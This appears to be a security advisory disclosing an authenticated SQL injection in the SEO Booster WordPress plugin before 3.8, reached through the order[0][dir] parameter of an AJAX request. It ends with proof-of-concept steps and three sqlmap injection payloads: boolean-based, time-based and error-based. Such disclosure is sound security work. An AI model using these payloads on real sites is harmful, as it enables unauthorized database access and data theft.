SEO Booster < 3.8 - Admin+ SQL Injection

The plugin allows for authenticated SQL injection via the “fn_my_ajaxified_dataloader_ajax” AJAX request as the $_REQUEST[‘order’][0][‘dir’] parameter is not properly escaped leading to blind and error-based SQL injections.

PoC

Install SEO Booster, then click on the “Incoming Keywords” link in the Wordpress administrative interface. An ajax request called “fn_my_ajaxified_dataloader_ajax” will be generated and sent. Intercept it and modify order[0][dir] parameter to achieve different types of SQL injections. Sqlmap vectors: 1. Type: boolean-based blind order[0][dir]=desc,(SELECT (CASE WHEN (1081=1081) THEN 1 ELSE 1081*(SELECT 1081 FROM INFORMATION_SCHEMA.PLUGINS) END)) 2. Type: time-based blind order[0][dir]=desc PROCEDURE ANALYSE(EXTRACTVALUE(8553,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x4b686547))))),1)# 3. Type: error-based order[0][dir]=desc,(SELECT 9426 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(9426=9426,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)